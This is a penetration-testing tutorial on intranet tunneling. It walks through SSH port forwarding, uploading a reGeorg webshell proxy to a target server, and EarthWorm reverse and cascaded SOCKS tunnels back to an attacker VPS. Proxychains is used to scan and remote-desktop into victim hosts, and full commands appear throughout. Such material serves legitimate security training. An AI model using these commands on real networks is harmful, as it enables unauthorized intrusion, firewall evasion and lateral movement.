In Intranet penetration test: hidden communication tunnel technology (part 1),We explained the tunneling technology of the network layer (IPv6 tunnel, ICMP tunnel) and the tunneling technology of the transport layer (TCP tunnel, UDP tunnel, conventional port forwarding). Nowadays, a large number of TCP and UDP communications are intercepted by defense systems. Traditional Socket tunnels are on the verge of being eliminated. DNS, ICMP, HTTP/HTTPS and other difficult-to-ban protocols have become the main channels for attackers to control the tunnel. In this section, we will give an experimental explanation of the application layer tunnel SOCKS proxy technology. I will write a special topic for the application layer DNS tunnel in the future.
Application layer tunneling technology
The Application layer is the seventh layer of the seven-layer OSI model. The application layer directly interfaces with application programs and provides common network application services. The application layer tunnel technology mainly uses the port provided by the application software to send data. Commonly used protocols are SSH, HTTP/HTTPS, and DNS. Here we mainly explain SSH and HTTP/HTTPS, DNS tunnel I will write a special topic to explain in the future.
SSH is a security protocol based on the application layer, a protocol designed to provide security for remote login sessions and other network services. The use of SSH protocol can effectively prevent information leakage during remote management. SSH was originally a program on UNIX systems, and then quickly expanded to other operating platforms. The SSH client is suitable for multiple platforms. Almost all UNIX platforms—including HP-UX, Linux, AIX, Solaris, DigitalUNIX, Irix, and other platforms, can run SSH.
In general, SSH protocol transmission is allowed to pass through firewalls and border devices, and the SSH transmission process is encrypted. It is difficult to distinguish whether it is a legal SSH session or a tunnel established by an attacker, so it is often used by attackers. After the attacker uses the SSH tunnel to break through the firewall restrictions, he can establish some TCP connections that could not be established before.
ssh username@ip -p <port number>
- -C：Compress transmission, increase transmission speed
-f: transfer ssh transmission to background execution without occupying the current shell
-N: Silent connection, no specific conversation can be seen after connection
-g: Allow remote hosts to connect to the local port used for forwarding
-L: local port forwarding
-R: remote port forwarding
-D: dynamic forwarding (SOCKS proxy)
-p: Specify the ssh port
Analog external network IP: 192.168.1.101
Intranet web server
Analog external network IP: 192.168.103
Intranet IP: 192.168.52.128
Intranet victim machine Windows Server 8
Intranet IP: 192.168.52.138
ssh -CfNg -L 1153 (vps port): 192.168.52.138 (target machine ip): 3389 (target port) email@example.com (springboard) //The attacker vps takes the initiative to connect to the web
ssh -CfNg -R 3307 (vps port): 192.168.52.138 (target machine ip): 3389 (target port) firstname.lastname@example.org (vps) // The victim host actively connects to vps
ssh -CfNg -D 7000 email@example.com(intranet web)
The dynamic port forwarding here is actually to establish a ssh-encrypted SOCKS proxy channel. The SOCKS proxy simply connects the system on one end to the other end, and sends your network data requests through a channel between you and the target machine. One end forwards to the other end. Any program that supports the SOCKS protocol can use this encrypted channel for proxy access.
HTTP protocol is hypertext transfer protocol, which is a very simple communication protocol that is most widely used in Internet uplink information transmission. Part of the local area network restricts the protocol and only allows users to access external websites through the HTTP protocol. The HTTP Service proxy is used to forward all traffic to the intranet.
Download link: https://github.com/sensepost/reGeorg
First of all, we need to understand the difference between forward proxy and reverse proxy:
In order to access Rhost, Lhost sends a request to the proxy proxy server and specifies that the target is Rhost, then the proxy forwards the request to Rhost and returns the obtained content to Lhost. Simply put, the forward proxy is that the proxy replaces us to visit Rhost.
Contrary to the forward proxy, Lhost only sends ordinary requests to the proxy. The proxy determines where to go, and then submits the returned data back. The advantage is that it can be effective when some firewalls only allow proxy data to enter and exit. To penetrate.
Simply put, forward proxy means that the attacker actively accesses the target machine through the proxy, and reverse proxy means the target machine actively connects through the proxy. The reDuh and tunna we usually use, like reGeorg, are all forward agents. Generally, users upload a proxy script to the server, the local program connects to the script on the server, and the script program acts as a proxy to forward ports and traffic.
Upload tunnel.(aspx|ashx|jsp|php) to the target Web server during operation, depending on what language the remote server supports. I am here as a php server, so we upload tunnel.nosocket.php. PHP is divided into sockets and non-sockets. Tunnel.php needs to use the dl() function to load the socket module, which needs to modify php.ini, so we use It is tunnel.nosocket.php.
python reGeorgSocksProxy.py -u http://192.168.1.7/tunnel.nosocket.php -p 9999
git clone https://github.com/rofl0r/proxychains-ng.git cd proxychains-ng ./configure make && make install cp ./src/proxychains.conf /etc/proxychians.conf cd .. && rm -rf proxychains-ng
Add at the end
socks5 127.0.0.1 9999 // 9999 is your own port, which needs to be the same as the port set in reGeorg
proxychains4 nmap 192.168.52.138 -Pn -sT -p 3389 // -Pn and -sT must have
proxychains4 rdesktop 192.168.52.138
Socks proxy is an all-powerful proxy, just like an adapter board with many jumpers, it simply connects the system on one end to the other end. Supports multiple protocols, including http, ftp requests and other types of requests. It is divided into two types, socks 4 and socks 5. Socks 4 only supports TCP protocol and socks 5 supports TCP/UDP protocol, and also supports various authentication mechanisms and other protocols. Its standard port is 1080. Socks proxy The corresponding proxy server using the socks protocol is the SOCKS server, which is a general proxy server. Use SOCKS to communicate with the target intranet computer to avoid multiple use of port forwarding.
In the internal network, the server can access the external network at will.
In the internal network, the server can access the external network, but the server is installed with a firewall to reject connections on sensitive ports.
In the internal network, the server only opens some ports (for example, port 80), and the server cannot access the external network.
Download link: https://github.com/rootkiter/EarthWorm
EW is a portable network penetration tool with two core functions: SOCKS v5 service setup and port forwarding. It can complete network penetration in a complex network environment. EarthWorm can open a network tunnel in “forward”, “reverse”, “multi-level cascade” and other ways to reach the depths of the network, breaking through network restrictions with earthworms’ unique means, and loosening the ground on the firewall. There are multiple executable files in the toolkit to adapt to different operating systems (Linux, Windows, Mac OS, ARM-Linux are all included)
Download link: https://github.com/sensepost/reGeorg
The main function of reGeorg is to forward the port of the intranet server to the local machine through the HTTP(S) tunnel, forming a loop. It can make the target server connect to the internal open port in the internal network (or when the port policy is set). reGeorg uses webshell to establish a socks proxy for intranet penetration, and the server must support one of ASPX, PHP, and JSP.
Download link: http://www.sockscap64.com/
SockCap64 is a very useful proxy software in the Windows environment, which can make Windows applications access the network through a SOCKS proxy server.
Download link: https://www.proxifier.com/
Proxifier is also a very easy-to-use global proxy software, which provides cross-platform port forwarding and proxy functions, and is suitable for Windows, Linux, and Mac OS platforms.
Download link: https://github.com/rofl0r/proxychains-ng
ProxyChains is a software that can implement a global proxy under Linux. It is very easy to use. It can enable any application to access the Internet through a proxy, allow TCP and DNS traffic to pass through the proxy tunnel, and support HTTP, SOCKS 4, and SOCK 5 type proxy servers.
Let me talk about the specific usage of these tools.
EW has six command formats, namely ssocksd, rcsocks, rssocks, lcx_slave, lcx_listen, lcx_tran. The ssocksd command is used for forward connections in a normal network environment, rcsocks and rssocks are used for rebound connections, and other commands are used for multi-level cascading in complex network environments.
(1) Forward SOCKS 5 server
It is applicable when the target machine has an external IP address, as shown in the figure above, the simulated external IP of the intranet web server is 192.168.1.7. Upload the corresponding ew program on the web server and execute:
ew_for_Win.exe -s ssocksd -l 888
proxychains4 rdesktop 192.168.52.138
The forward SOCKS 5 server is applicable when the target machine has an external IP address. Assuming that the target machine does not have a public IP address, how do we access internal resources?
./ew_for_linux64 -s rcsocks -l 1080 -e 1234
ew_for_Win.exe -s rssocks -d 39.xxx.xxx.210 -e 1234
proxychains4 rdesktop 192.168.52.141
It is applicable when the target machine has an external IP address.
ew_for_Win.exe -s ssocksd -l 1234
ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.52.138 -g 1234
(4) Secondary network environment (b)
The one just now applies to the situation where the target machine has an external IP address, assuming that the target machine does not have a public IP address, what should we do?
Here, we cannot access host A to use the socks proxy service set up on host B in the intranet as in the previous case, and can access the socks service set up on host B by accessing vps.
We first upload ew on the public network vps, add a transfer tunnel on the public network vps, monitor port 1080, and send the proxy request received from port 1080 to port 1234, and execute the command:
ew_for_linux64 -s lcx_listen -l 1080 -e 1234
ew_for_Win.exe -s ssocksd -l 999
ew_for_Win.exe -s lcx_slave -d 39.xxx.xxx.210 -e 1234 -f 192.168.52.138 -g 999
Open, sockscap64, add the application you want to proxy (the method is very simple, just drag in after you find the executable file), here I add the remote desktop program